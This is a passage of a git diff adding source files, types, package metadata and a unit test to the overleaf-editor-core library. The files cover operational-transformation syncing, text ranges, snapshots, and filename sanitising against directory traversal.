this.timestamp = timestamp + } + + static fromRaw(raw) { + return new RestoreOrigin(raw.version, new Date(raw.timestamp)) + } + + /** @inheritdoc */ + toRaw() { + return { + kind: RestoreOrigin.KIND, + version: this.version, + timestamp: this.timestamp.toISOString(), + } + } + + /** + * @return {number} + */ + getVersion() { + return this.version + } + + /** + * @return {Date} + */ + getTimestamp() { + return this.timestamp + } +} + +RestoreOrigin.KIND = 'restore' + +module.exports = RestoreOrigin diff --git a/libraries/overleaf-editor-core/lib/origin/restore_project_origin.js b/libraries/overleaf-editor-core/lib/origin/restore_project_origin.js new file mode 100644 index 0000000..9db14b1 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/origin/restore_project_origin.js @@ -0,0 +1,51 @@ +'use strict' + +const assert = require('check-types').assert + +const Origin = require('.') + +class RestoreProjectOrigin extends Origin { + /** + * @param {number} version that was restored + * @param {Date} timestamp from the restored version + */ + constructor(version, timestamp) { + assert.integer(version, 'RestoreProjectOrigin: bad version') + assert.date(timestamp, 'RestoreProjectOrigin: bad timestamp') + + super(RestoreProjectOrigin.KIND) + this.version = version + this.timestamp = timestamp + } + + static fromRaw(raw) { + return new RestoreProjectOrigin(raw.version, new Date(raw.timestamp)) + } + + /** @inheritdoc */ + toRaw() { + return { + kind: RestoreProjectOrigin.KIND, + version: this.version, + timestamp: this.timestamp.toISOString(), + } + } + + /** + * @return {number} + */ + getVersion() { + return this.version + } + + /** + * @return {Date} + */ + getTimestamp() { + return this.timestamp + } +} + +RestoreProjectOrigin.KIND = 'project-restore' + +module.exports = RestoreProjectOrigin diff --git a/libraries/overleaf-editor-core/lib/ot_client.js b/libraries/overleaf-editor-core/lib/ot_client.js new file mode 100644 index 0000000..379f9bc --- /dev/null +++ b/libraries/overleaf-editor-core/lib/ot_client.js @@ -0,0 +1,239 @@ +'use strict' + +const _ = require('lodash') + +const ChangeNote = require('./change_note') +const ChangeRequest = require('./change_request') +const Chunk = require('./chunk') +const Operation = require('./operation') + +/** + * Operational Transformation client. + * + * See OT.md for explanation. + */ +class OtClient { + constructor(_projectId, _editor, _blobStore, _socket) { + const STATE_DISCONNECTED = 0 + const STATE_LOADING = 1 + const STATE_READY = 2 + const STATE_WAITING = 3 + + let _version = null + let _state = STATE_DISCONNECTED + const _buffer = [] + let _ackVersion = null + let _outstanding = [] + let _pending = [] + const _waiting = [] + + this.connect = function otClientConnect() { + switch (_state) { + case STATE_DISCONNECTED: + _state = STATE_LOADING + _socket.emit('authenticate', { + projectId: _projectId, + token: 'letmein', + }) + break + default: + throw new Error('connect in state ' + _state) + } + } + + /** + * The latest project version number for which the client can construct the + * project content. + * + * @return {number} non-negative + */ + this.getVersion = function () { + return _version + } + + _socket.on('load', function otClientOnLoad(data) { + switch (_state) { + case STATE_LOADING: { + const chunk = Chunk.fromRaw(data) + const snapshot = chunk.getSnapshot() + snapshot.applyAll(chunk.getChanges(), { strict: true }) + _version = chunk.getEndVersion() + // TODO: we can get remote changes here, so it's not correct to wait for + // the editor to load before transitioning to the READY state + _editor.load(snapshot).then(function () { + _state = STATE_READY + }) + break + } + default: + throw new Error('loaded in state ' + _state) + } + }) + + // + // Local Operations + // + + function sendOutstandingChange() { + const changeRequest = new ChangeRequest(_version, _outstanding) + _socket.emit('change', changeRequest.toRaw()) + _state = STATE_WAITING + } + + function sendLocalOperation(operation) { + _outstanding.push(operation) + sendOutstandingChange() + } + + function queueLocalOperation(operation) { + _pending.push(operation) + } + + this.handleLocalOperation = function otClientHandleLocalOperation( + operation + ) { + switch (_state) { + case STATE_READY: + sendLocalOperation(operation) + break + case STATE_WAITING: + queueLocalOperation(operation) + break + default: + throw new Error('local operation in state ' + _state) + } + } + + /** + * A promise that resolves when the project reaches the given version. + * + * @param {number} version non-negative + * @return {Promise} + */ + this.waitForVersion = function otClientWaitForVersion(version) { + if (!_waiting[version]) _waiting[version] = [] + return new Promise(function (resolve, reject) { + _waiting[version].push(resolve) + }) + } + + function resolveWaitingPromises() { + for (const version in _waiting) { + if (!Object.prototype.hasOwnProperty.call(_waiting, version)) continue + if (version > _version) continue + _waiting[version].forEach(function (resolve) { + resolve() + }) + delete _waiting[version] + } + } + + // + // Messages from Server + // + + function advanceIfReady() { + if (_ackVersion !== null && _version === _ackVersion) { + _version += 1 + _ackVersion = null + handleAckReady() + advanceIfReady() + return + } + const changeNotes = _.remove(_buffer, function (changeNote) { + return changeNote.getBaseVersion() === _version + }) + if (changeNotes.length === 1) { + handleRemoteChangeReady(changeNotes[0].getChange()) + _version += 1 + advanceIfReady() + return + } + if (changeNotes.length !== 0) { + throw new Error('multiple remote changes in client version ' + _version) + } + } + + function bufferRemoteChangeNote(changeNote) { + const version = changeNote.getBaseVersion() + if (_.find(_buffer, 'baseVersion', version)) { + throw new Error('multiple changes in version ' + version) + } + if (version === _ackVersion) { + throw new Error('received change that was acked in ' + _ackVersion) + } + _buffer.push(changeNote) + } + + function handleAckReady() { + // console.log('handleAckReady') + if (_outstanding.length === 0) { + throw new Error('ack complete without outstanding change') + } + if (_state !== STATE_WAITING) { + throw new Error('ack complete in state ' + _state) + } + _editor.handleChangeAcknowledged() + resolveWaitingPromises() + if (_pending.length > 0) { + _outstanding = _pending + _pending = [] + sendOutstandingChange() + } else { + _outstanding = [] + _state = STATE_READY + } + } + + function handleRemoteChangeReady(change) { + if (_pending.length > 0) { + if (_outstanding.length === 0) { + throw new Error('pending change without outstanding change') + } + } + + Operation.transformMultiple(_outstanding, change.getOperations()) + Operation.transformMultiple(_pending, change.getOperations()) + + _editor.applyRemoteChange(change) + } + + _socket.on('ack', function otClientOnAck(data) { + switch (_state) { + case STATE_WAITING: { + const changeNote = ChangeNote.fromRaw(data) + _ackVersion = changeNote.getBaseVersion() + advanceIfReady() + break + } + default: + throw new Error('ack in state ' + _state) + } + }) + + _socket.on('change', function otClientOnChange(data) { + switch (_state) { + case STATE_READY: + case STATE_WAITING: + bufferRemoteChangeNote(ChangeNote.fromRaw(data)) + advanceIfReady() + break + default: + throw new Error('remote change in state ' + _state) + } + }) + + // + // Connection State + // TODO: socket.io error handling + // + + _socket.on('disconnect', function () { + _state = STATE_DISCONNECTED + // eslint-disable-next-line no-console + console.log('disconnected') // TODO: how do we handle disconnect? + }) + } +} + +module.exports = OtClient diff --git a/libraries/overleaf-editor-core/lib/range.js b/libraries/overleaf-editor-core/lib/range.js new file mode 100644 index 0000000..bc47632 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/range.js @@ -0,0 +1,232 @@ +// @ts-check + +const OError = require('@overleaf/o-error') + +/** + * @import { RawRange } from './types' + */ + +class Range { + /** + * @param {number} pos + * @param {number} length + */ + constructor(pos, length) { + if (pos < 0 || length < 0) { + throw new OError('Invalid range', { pos, length }) + } + /** @readonly */ + this.pos = pos + /** @readonly */ + this.length = length + } + + /** + * @return {number} + */ + get start() { + return this.pos + } + + /** + * @return {number} + */ + get end() { + return this.pos + this.length + } + + /** + * Is this range equal to the given range? + * + * @param {Range} other + * @returns {boolean} + */ + equals(other) { + return this.pos === other.pos && this.length === other.length + } + + /** + * @param {Range} range + * @returns {boolean} + */ + startsAfter(range) { + return this.start >= range.end + } + + /** + * @param {number} pos + * @returns {boolean} + */ + startIsAfter(pos) { + return this.start > pos + } + + /** + * + * @returns {boolean} + */ + isEmpty() { + return this.length === 0 + } + + /** + * checks if the range contains a given range + * @param {Range} range + */ + contains(range) { + return this.start <= range.start && this.end >= range.end + } + + /** + * checks if the range contains a cursor (i.e. is not at the ends of the range) + * @param {number} cursor + */ + containsCursor(cursor) { + return this.start <= cursor && this.end >= cursor + } + + /** + * @param {Range} range + */ + overlaps(range) { + return this.start < range.end && this.end > range.start + } + + /** + * checks if the range touches a given range + * @param {Range} range + */ + touches(range) { + return this.end === range.start || this.start === range.end + } + + /** + * @param {Range} range + * @returns {Range} + */ + subtract(range) { + if (this.contains(range)) { + return this.shrinkBy(range.length) + } + + if (range.contains(this)) { + return new Range(this.pos, 0) + } + + if (range.overlaps(this)) { + if (range.start < this.start) { + const intersectedLength = range.end - this.start + return new Range(range.pos, this.length - intersectedLength) + } else { + const intersectedLength = this.end - range.start + return new Range(this.pos, this.length - intersectedLength) + } + } + + return new Range(this.pos, this.length) + } + + /** + * @param {Range} range + * @returns {boolean} + */ + canMerge(range) { + return this.overlaps(range) || this.touches(range) + } + + /** + * @param {Range} range + */ + merge(range) { + if (!this.canMerge(range)) { + throw new Error('Ranges cannot be merged') + } + const newPos = Math.min(this.pos, range.pos) + const newEnd = Math.max(this.end, range.end) + + return new Range(newPos, newEnd - newPos) + } + + /** + * Moves the range by a given number + * @param {number} length + */ + moveBy(length) { + return new Range(this.pos + length, this.length) + } + + /** + * Extends the range by a given number + * @param {number} extensionLength + */ + extendBy(extensionLength) { + return new Range(this.pos, this.length + extensionLength) + } + + /** + * Shrinks the range by a given number + * @param {number} shrinkLength + */ + shrinkBy(shrinkLength) { + const newLength = this.length - shrinkLength + + if (newLength < 0) { + throw new Error('Cannot shrink range by more than its length') + } + + return new Range(this.pos, newLength) + } + + /** + * Splits a range on the cursor and insert a range with the length provided + * @param {number} cursor + * @param {number} length + * @returns {[Range, Range, Range]} + */ + insertAt(cursor, length) { + if (!this.containsCursor(cursor)) { + throw new Error('The cursor must be contained in the range') + } + const rangeUpToCursor = new Range(this.pos, cursor - this.pos) + const insertedRange = new Range(cursor, length) + const rangeAfterCursor = new Range( + cursor + length, + this.length - rangeUpToCursor.length + ) + return [rangeUpToCursor, insertedRange, rangeAfterCursor] + } + + toRaw() { + return { + pos: this.pos, + length: this.length, + } + } + + /** + * @param {RawRange} raw + * @return {Range} + */ + static fromRaw(raw) { + return new Range(raw.pos, raw.length) + } + + /** + * Splits a range into two ranges, at a given cursor + * @param {number} cursor + * @returns {[Range, Range]} + */ + splitAt(cursor) { + if (!this.containsCursor(cursor)) { + throw new Error('The cursor must be contained in the range') + } + const rangeUpToCursor = new Range(this.pos, cursor - this.pos) + const rangeAfterCursor = new Range( + cursor, + this.length - rangeUpToCursor.length + ) + return [rangeUpToCursor, rangeAfterCursor] + } +} + +module.exports = Range diff --git a/libraries/overleaf-editor-core/lib/safe_pathname.js b/libraries/overleaf-editor-core/lib/safe_pathname.js new file mode 100644 index 0000000..91bbd5b --- /dev/null +++ b/libraries/overleaf-editor-core/lib/safe_pathname.js @@ -0,0 +1,142 @@ +// @ts-check +'use strict' + +const path = require('path-browserify') + +/** + * Regular expressions for Overleaf v2 taken from + * https://github.com/overleaf/internal/blob/f7b287b6a07354000a6b463ca3a5828104e4a811/services/web/app/src/Features/Project/SafePath.js + */ + +// +// Regex of characters that are invalid in filenames +// +// eslint-disable-next-line no-control-regex +const BAD_CHAR_RX = /[/*\u0000-\u001F\u007F\u0080-\u009F\uD800-\uDFFF]/g + +// +// Regex of filename patterns that are invalid ("." ".." and leading/trailing +// whitespace) +// +const BAD_FILE_RX = /(^\.$)|(^\.\.$)|(^\s+)|(\s+$)/g + +// +// Put a block on filenames which match javascript property names, as they +// can cause exceptions where the code puts filenames into a hash. This is a +// temporary workaround until the code in other places is made safe against +// property names. +// +// See https://github.com/overleaf/write_latex/wiki/Using-javascript-Objects-as-Maps +// +const BLOCKED_FILE_RX = + /^(prototype|constructor|toString|toLocaleString|valueOf|hasOwnProperty|isPrototypeOf|propertyIsEnumerable|__defineGetter__|__lookupGetter__|__defineSetter__|__lookupSetter__|__proto__)$/ + +// +// Maximum path length, in characters. This is fairly arbitrary. +// +const MAX_PATH = 1024 + +/** + * Replace invalid characters and filename patterns in a filename with + * underscores. + * @param {string} filename + */ +function cleanPart(filename) { + filename = filename.replace(BAD_CHAR_RX, '_') + filename = filename.replace(BAD_FILE_RX, function (match) { + return new Array(match.length + 1).join('_') + }) + return filename +} + +/** + * All pathnames in a Snapshot must be clean. We want pathnames that: + * + * 1. are unambiguous (e.g. no `.`s or redundant path separators) + * 2. do not allow directory traversal attacks (e.g. no `..`s or absolute paths) + * 3. do not contain leading/trailing space + * 4. do not contain the character '*' in filenames + * + * We normalise the pathname, split it by the separator and then clean each part + * as a filename + * + * @param {string} pathname + * @return {String} + */ +exports.clean = function (pathname) { + return exports.cleanDebug(pathname)[0] +} + +/** + * See clean + * @param {string} pathname + * @return {[string,string]} + */ +exports.cleanDebug = function (pathname) { + let prev = pathname + let reason = '' + + /** + * @param {string} label + */ + function recordReasonIfChanged(label) { + if (pathname === prev) return + if (reason) reason += ',' + reason += label + prev = pathname + } + pathname = path.normalize(pathname) + recordReasonIfChanged('normalize') + + pathname = pathname.replace(/\\/g, '/') + recordReasonIfChanged('workaround for IE') + + pathname = pathname.replace(/\/+/g, '/') + recordReasonIfChanged('no multiple slashes') + + pathname = pathname.replace(/^(\/.*)$/, '_$1') + recordReasonIfChanged('no leading /') + + pathname = pathname.replace(/^(.+)\/$/, '$1') + recordReasonIfChanged('no trailing /') + + pathname = pathname.replace(/^ *(.*)$/, '$1') + recordReasonIfChanged('no leading spaces') + + pathname = pathname.replace(/^(.*[^ ]) *$/, '$1') + recordReasonIfChanged('no trailing spaces') + + if (pathname.length === 0) pathname = '_' + recordReasonIfChanged('empty') + + pathname = pathname.split('/').map(cleanPart).join('/') + recordReasonIfChanged('cleanPart') + + pathname = pathname.replace(BLOCKED_FILE_RX, '@$1') + recordReasonIfChanged('BLOCKED_FILE_RX') + return [pathname, reason] +} + +/** + * A pathname is clean (see clean) and not too long. + * + * @param {string} pathname + * @return {Boolean} + */ +exports.isClean = function pathnameIsClean(pathname) { + return exports.isCleanDebug(pathname)[0] +} + +/** + * A pathname is clean (see clean) and not too long. + * + * @param {string} pathname + * @return {[boolean,string]} + */ +exports.isCleanDebug = function (pathname) { + if (pathname.length > MAX_PATH) return [false, 'MAX_PATH'] + if (pathname.length === 0) return [false, 'empty'] + const [cleanPathname, reason] = exports.cleanDebug(pathname) + if (cleanPathname !== pathname) return [false, reason] + return [true, ''] +} diff --git a/libraries/overleaf-editor-core/lib/snapshot.js b/libraries/overleaf-editor-core/lib/snapshot.js new file mode 100644 index 0000000..c33b48f --- /dev/null +++ b/libraries/overleaf-editor-core/lib/snapshot.js @@ -0,0 +1,284 @@ +// @ts-check +'use strict' + +const assert = require('check-types').assert +const OError = require('@overleaf/o-error') + +const FileMap = require('./file_map') +const V2DocVersions = require('./v2_doc_versions') + +const FILE_LOAD_CONCURRENCY = 50 + +/** + * @import { BlobStore, RawSnapshot, ReadonlyBlobStore } from "./types" + * @import Change from "./change" + * @import TextOperation from "./operation/text_operation" + * @import File from "./file" + */ + +class EditMissingFileError extends OError {} + +/** + * A Snapshot represents the state of a {@link Project} at a + * particular version. + */ +class Snapshot { + static PROJECT_VERSION_RX_STRING = '^[0-9]+\\.[0-9]+$' + static PROJECT_VERSION_RX = new RegExp(Snapshot.PROJECT_VERSION_RX_STRING) + static EditMissingFileError = EditMissingFileError + + /** + * @param {RawSnapshot} raw + * @return {Snapshot} + */ + static fromRaw(raw) { + assert.object(raw.files, 'bad raw.files') + return new Snapshot( + FileMap.fromRaw(raw.files), + raw.projectVersion, + V2DocVersions.fromRaw(raw.v2DocVersions) + ) + } + + toRaw() { + /** @type RawSnapshot */ + const raw = { + files: this.fileMap.toRaw(), + } + if (this.projectVersion) raw.projectVersion = this.projectVersion + if (this.v2DocVersions) raw.v2DocVersions = this.v2DocVersions.toRaw() + return raw + } + + /** + * @param {FileMap} [fileMap] + * @param {string} [projectVersion] + * @param {V2DocVersions} [v2DocVersions] + */ + constructor(fileMap, projectVersion, v2DocVersions) { + assert.maybe.instance(fileMap, FileMap, 'bad fileMap') + + this.fileMap = fileMap || new FileMap({}) + this.projectVersion = projectVersion + this.v2DocVersions = v2DocVersions + } + + /** + * @return {string | null | undefined} + */ + getProjectVersion() { + return this.projectVersion + } + + /** + * @param {string} projectVersion + */ + setProjectVersion(projectVersion) { + assert.maybe.match( + projectVersion, + Snapshot.PROJECT_VERSION_RX, + 'Snapshot: bad projectVersion' + ) + this.projectVersion = projectVersion + } + + /** + * @return {V2DocVersions | null | undefined} + */ + getV2DocVersions() { + return this.v2DocVersions + } + + /** + * @param {V2DocVersions} v2DocVersions + */ + setV2DocVersions(v2DocVersions) { + assert.maybe.instance( + v2DocVersions, + V2DocVersions, + 'Snapshot: bad v2DocVersions' + ) + this.v2DocVersions = v2DocVersions + } + + /** + * @param {V2DocVersions} v2DocVersions + */ + updateV2DocVersions(v2DocVersions) { + // merge new v2DocVersions into this.v2DocVersions + v2DocVersions.applyTo(this) + } + + /** + * The underlying file map. + * @return {FileMap} + */ + getFileMap() { + return this.fileMap + } + + /** + * The pathnames of all of the files. + * + * @return {Array.} in no particular order + */ + getFilePathnames() { + return this.fileMap.getPathnames() + } + + /** + * Get a File by its pathname. + * @see FileMap#getFile + * @param {string} pathname + */ + getFile(pathname) { + return this.fileMap.getFile(pathname) + } + + /** + * Add the given file to the snapshot. + * @see FileMap#addFile + * @param {string} pathname + * @param {File} file + */ + addFile(pathname, file) { + this.fileMap.addFile(pathname, file) + } + + /** + * Move or remove a file. + * @see FileMap#moveFile + * @param {string} pathname + * @param {string} newPathname + */ + moveFile(pathname, newPathname) { + this.fileMap.moveFile(pathname, newPathname) + if (this.v2DocVersions) this.v2DocVersions.moveFile(pathname, newPathname) + } + + /** + * The number of files in the snapshot. + * + * @return {number} + */ + countFiles() { + return this.fileMap.countFiles() + } + + /** + * Edit the content of an editable file. + * + * Throws an error if no file with the given name exists. + * + * @param {string} pathname + * @param {TextOperation} textOperation + */ + editFile(pathname, textOperation) { + const file = this.fileMap.getFile(pathname) + if (!file) { + throw new Snapshot.EditMissingFileError( + `can't find file for editing: ${pathname}` + ) + } + file.edit(textOperation) + } + + /** + * Apply all changes in sequence. Modifies the snapshot in place. + * + * Ignore recoverable errors (caused by historical bad data) unless opts.strict is true + * + * @param {Change[]} changes + * @param {object} [opts] + * @param {boolean} opts.strict - do not ignore recoverable errors + */ + applyAll(changes, opts) { + for (const change of changes) { + change.applyTo(this, opts) + } + } + + /** + * If the Files in this Snapshot reference blob hashes, add them to the given + * set. + * + * @param {Set.} blobHashes + */ + findBlobHashes(blobHashes) { + /** + * @param {File} file + */ + function find(file) { + const hash = file.getHash() + const rangeHash = file.getRangesHash() + if (hash) blobHashes.add(hash) + if (rangeHash) blobHashes.add(rangeHash) + } + // TODO(das7pad): refine types to enforce no nulls in FileMapData + // @ts-ignore + this.fileMap.map(find) + } + + /** + * Load all of the files in this snapshot. + * + * @param {string} kind see {File#load} + * @param {ReadonlyBlobStore} blobStore + * @return {Promise>} an object where keys are the pathnames and + * values are the files in the snapshot + */ + async loadFiles(kind, blobStore) { + /** + * @param {File} file + */ + function load(file) { + return file.load(kind, blobStore) + } + // TODO(das7pad): refine types to enforce no nulls in FileMapData + // @ts-ignore + return await this.fileMap.mapAsync(load, FILE_LOAD_CONCURRENCY) + } + + /** + * Store each of the files in this snapshot and return the raw snapshot for + * long term storage. + * + * @param {BlobStore} blobStore + * @param {number} [concurrency] + * @return {Promise.} + */ + async store(blobStore, concurrency) { + assert.maybe.number(concurrency, 'bad concurrency') + + const projectVersion = this.projectVersion + const rawV2DocVersions = this.v2DocVersions + ? this.v2DocVersions.toRaw() + : undefined + + /** + * @param {File} file + */ + function store(file) { + return file.store(blobStore) + } + // TODO(das7pad): refine types to enforce no nulls in FileMapData + // @ts-ignore + const rawFiles = await this.fileMap.mapAsync(store, concurrency) + return { + files: rawFiles, + projectVersion, + v2DocVersions: rawV2DocVersions, + } + } + + /** + * Create a deep clone of this snapshot. + * + * @return {Snapshot} + */ + clone() { + return Snapshot.fromRaw(this.toRaw()) + } +} + +module.exports = Snapshot diff --git a/libraries/overleaf-editor-core/lib/types.ts b/libraries/overleaf-editor-core/lib/types.ts new file mode 100644 index 0000000..53bf062 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/types.ts @@ -0,0 +1,175 @@ +import Blob from './blob' +import TrackingProps from './file_data/tracking_props' +import ClearTrackingProps from './file_data/clear_tracking_props' + +export type BlobStore = { + getBlob(hash: string): Promise + getString(hash: string): Promise + putString(content: string): Promise + putObject(obj: object): Promise + getObject(hash: string): Promise +} + +export type ReadonlyBlobStore = Pick + +export type RangesBlob = { + comments: CommentRawData[] + trackedChanges: TrackedChangeRawData[] +} + +export type RawRange = { + pos: number + length: number +} + +export type CommentRawData = { + id: string + ranges: RawRange[] + resolved?: boolean +} + +export type TrackedChangeRawData = { + range: RawRange + tracking: TrackingPropsRawData +} + +export type TrackingPropsRawData = { + type: 'insert' | 'delete' + userId: string + ts: string +} + +export type ClearTrackingPropsRawData = { + type: 'none' +} + +export type TrackingDirective = TrackingProps | ClearTrackingProps + +export type StringFileRawData = { + content: string + comments?: CommentRawData[] + trackedChanges?: TrackedChangeRawData[] +} + +export type RawOrigin = { + kind: string +} + +export type RawChange = { + operations: RawOperation[] + timestamp: string + authors?: (number | null)[] + v2Authors: string[] + origin: RawOrigin + projectVersion: string + v2DocVersions: RawV2DocVersions +} + +export type RawOperation = + | RawEditFileOperation + // TODO(das7pad): add types for all the other operations + | object + +export type RawSnapshot = { + files: RawFileMap + projectVersion?: string + v2DocVersions?: RawV2DocVersions | null +} + +export type RawHistory = { + snapshot: RawSnapshot + changes: RawChange[] +} + +export type RawChunk = { + history: RawHistory + startVersion: number +} + +export type RawFileMap = Record + +export type RawFile = { metadata?: Object } & RawFileData + +export type RawFileData = + | RawBinaryFileData + | RawHashFileData + | RawHollowBinaryFileData + | RawHollowStringFileData + | RawLazyStringFileData + | StringFileRawData + +export type RawHashFileData = { hash: string; rangesHash?: string } +export type RawBinaryFileData = { hash: string; byteLength: number } +export type RawLazyStringFileData = { + hash: string + stringLength: number + rangesHash?: string + operations?: RawEditOperation[] +} +export type RawHollowBinaryFileData = { byteLength: number } +export type RawHollowStringFileData = { stringLength: number } + +export type RawV2DocVersions = Record + +export type RawInsertOp = + | { + i: string + commentIds?: string[] + tracking?: TrackingPropsRawData + } + | string + +export type RawRemoveOp = number +export type RawRetainOp = + | { + r: number + commentIds?: string[] + tracking?: TrackingPropsRawData | ClearTrackingPropsRawData + } + | number + +export type RawScanOp = RawInsertOp | RawRemoveOp | RawRetainOp + +export type RawTextOperation = { + textOperation: RawScanOp[] + contentHash?: string +} + +export type RawAddCommentOperation = { + commentId: string + ranges: RawRange[] + resolved?: boolean +} + +export type RawDeleteCommentOperation = { deleteComment: string } + +export type RawSetCommentStateOperation = { + commentId: string + resolved: boolean +} + +export type RawEditNoOperation = { + noOp: true +} + +export type RawEditFileOperation = RawEditOperation & { pathname: string } + +export type RawEditOperation = + | RawTextOperation + | RawAddCommentOperation + | RawDeleteCommentOperation + | RawSetCommentStateOperation + | RawEditNoOperation + +export type LinkedFileData = { + importedAt: string + provider: string + [other: string]: any +} + +export type RawLabel = { + text: string + authorId: number | null + timestamp: string + version: number +} diff --git a/libraries/overleaf-editor-core/lib/util.js b/libraries/overleaf-editor-core/lib/util.js new file mode 100644 index 0000000..52b1ab8 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/util.js @@ -0,0 +1,14 @@ +/* + * Misc functions + */ + +'use strict' + +/** + * @param {string} str + * @returns {boolean} true if the given string contains non-BMP chars otherwise false + */ +exports.containsNonBmpChars = function utilContainsNonBmpChars(str) { + // check for first (high) surrogate in a non-BMP character + return /[\uD800-\uDBFF]/.test(str) +} diff --git a/libraries/overleaf-editor-core/lib/v2_doc_versions.js b/libraries/overleaf-editor-core/lib/v2_doc_versions.js new file mode 100644 index 0000000..2cfada5 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/v2_doc_versions.js @@ -0,0 +1,83 @@ +// @ts-check +'use strict' + +const _ = require('lodash') + +/** + * @import File from "./file" + * @import Snapshot from "./snapshot" + * @import { RawV2DocVersions } from "./types" + */ + +class V2DocVersions { + /** + * @param {RawV2DocVersions} data + */ + constructor(data) { + this.data = data || {} + } + + /** + * @param {RawV2DocVersions?} [raw] + * @return {V2DocVersions|undefined} + */ + static fromRaw(raw) { + if (!raw) return undefined + return new V2DocVersions(raw) + } + + /** + * @return {RawV2DocVersions|null} + */ + toRaw() { + if (!this.data) return null + const raw = _.clone(this.data) + return raw + } + + /** + * Clone this object. + * + * @return {V2DocVersions|undefined} a new object of the same type + */ + clone() { + return V2DocVersions.fromRaw(this.toRaw()) + } + + /** + * @param {Snapshot} snapshot + */ + applyTo(snapshot) { + // Only update the snapshot versions if we have new versions + if (!_.size(this.data)) return + + // Create v2DocVersions in snapshot if it does not exist + // otherwise update snapshot v2docversions + if (!snapshot.v2DocVersions) { + snapshot.v2DocVersions = this.clone() + } else { + _.assign(snapshot.v2DocVersions.data, this.data) + } + } + + /** + * Move or remove a doc. + * Must be called after FileMap#moveFile, which validates the paths. + * @param {string} pathname + * @param {string} newPathname + */ + moveFile(pathname, newPathname) { + for (const [id, v] of Object.entries(this.data)) { + if (v.pathname !== pathname) continue + + if (newPathname === '') { + delete this.data[id] + } else { + v.pathname = newPathname + } + break + } + } +} + +module.exports = V2DocVersions diff --git a/libraries/overleaf-editor-core/package.json b/libraries/overleaf-editor-core/package.json new file mode 100644 index 0000000..f5d826a --- /dev/null +++ b/libraries/overleaf-editor-core/package.json @@ -0,0 +1,34 @@ +{ + "name": "overleaf-editor-core", + "version": "1.0.0", + "description": "Library shared between the editor server and clients.", + "main": "index.js", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "test:ci": "npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "types:check": "tsc --noEmit" + }, + "author": "team@overleaf.com", + "license": "Proprietary", + "private": true, + "devDependencies": { + "@types/check-types": "^7.3.7", + "@types/path-browserify": "^1.0.2", + "chai": "^3.3.0", + "mocha": "^11.1.0", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + }, + "dependencies": { + "@overleaf/o-error": "*", + "check-types": "^5.1.0", + "lodash": "^4.17.19", + "p-map": "^4.0.0", + "path-browserify": "^1.0.1" + } +} diff --git a/libraries/overleaf-editor-core/test/add_comment_operation.test.js b/libraries/overleaf-editor-core/test/add_comment_operation.test.js new file mode 100644 index 0000000..72d43d6 --- /dev/null +++ b/libraries/overleaf-editor-core/test/add_comment_operation.test.js @@ -0,0 +1,127 @@ +// @ts-check +const { expect } = require('chai') +const { AddCommentOperation, DeleteCommentOperation } = require('..') +const Range = require('../lib/range') +const StringFileData = require('../lib/file_data/string_file_data') + +describe('AddCommentOperation', function () { + it('constructs an AddCommentOperation fromJSON', function () { + const op = AddCommentOperation.fromJSON({ + commentId: '123', + resolved: true, + ranges: [{ pos: 0, length: 1 }], + }) + expect(op).to.be.instanceOf(AddCommentOperation) + expect(op.commentId).to.equal('123') + expect(op.ranges[0]).to.be.instanceOf(Range) + expect(op.resolved).to.be.true + }) + + it('should convert to JSON', function () { + const op = new AddCommentOperation('123', [new Range(0, 1)]) + expect(op.toJSON()).to.eql({ + commentId: '123', + ranges: [ + { + pos: 0, + length: 1, + }, + ], + }) + }) + + it('should apply operation', function () { + const fileData = new StringFileData('abc') + const op = new AddCommentOperation('123', [new Range(0, 1)]) + op.apply(fileData) + expect(fileData.getComments().toRaw()).to.eql([ + { + id: '123', + ranges: [{ pos: 0, length: 1 }], + }, + ]) + }) + + describe('invert', function () { + it('should delete added comment', function () { + const initialFileData = new StringFileData('abc') + const fileData = StringFileData.fromRaw(initialFileData.toRaw()) + const op = new AddCommentOperation('123', [new Range(0, 1)]) + op.apply(fileData) + expect(fileData.getComments().toRaw()).to.eql([ + { + id: '123', + ranges: [{ pos: 0, length: 1 }], + }, + ]) + const invertedOp = op.invert(initialFileData) + invertedOp.apply(fileData) + expect(fileData.getComments().toRaw()).to.eql([]) + }) + + it('should restore previous comment ranges', function () { + const initialComments = [ + { + id: '123', + ranges: [{ pos: 0, length: 1 }], + }, + ] + + const initialFileData = new StringFileData( + 'the quick brown fox jumps over the lazy dog', + initialComments + ) + const fileData = StringFileData.fromRaw(initialFileData.toRaw()) + const op = new AddCommentOperation('123', [new Range(12, 7)], true) + op.apply(fileData) + expect(fileData.getComments().toRaw()).to.eql([ + { + id: '123', + ranges: [{ pos: 12, length: 7 }], + resolved: true, + }, + ]) + + const invertedOp = op.invert(initialFileData) + invertedOp.apply(fileData) + expect(fileData.getComments().toRaw()).to.deep.equal(initialComments) + }) + + it('should restore previous comment resolution status', function () { + const initialComments = [ + { + id: '123', + ranges: [{ pos: 0, length: 1 }], + }, + ] + + const initialFileData = new StringFileData( + 'the quick brown fox jumps over the lazy dog', + initialComments + ) + const fileData = StringFileData.fromRaw(initialFileData.toRaw()) + const op = new AddCommentOperation('123', [new Range(0, 1)], true) + op.apply(fileData) + expect(fileData.getComments().toRaw()).to.eql([ + { + id: '123', + ranges: [{ pos: 0, length: 1 }], + resolved: true, + }, + ]) + + const invertedOp = op.invert(initialFileData) + invertedOp.apply(fileData) + expect(fileData.getComments().toRaw()).to.deep.equal(initialComments) + }) + }) + + it('should compose with DeleteCommentOperation', function () { + const addOp = new AddCommentOperation('123', [new Range(0, 1)]) + const deleteOp = new DeleteCommentOperation('123') + expect(addOp.canBeComposedWith(deleteOp)).to.be.true + + const composedOp = addOp.compose(deleteOp) + expect(composedOp).to.be.instanceOf(DeleteCommentOperation) + }) +}) diff --git a/libraries/overleaf-editor-core/test/change.test.js b/libraries/overleaf-editor-core/test/change.test.js new file mode 100644 index 0000000..b4704fa --- /dev/null +++ b/libraries/overleaf-editor-core/test/change.test.js @@ 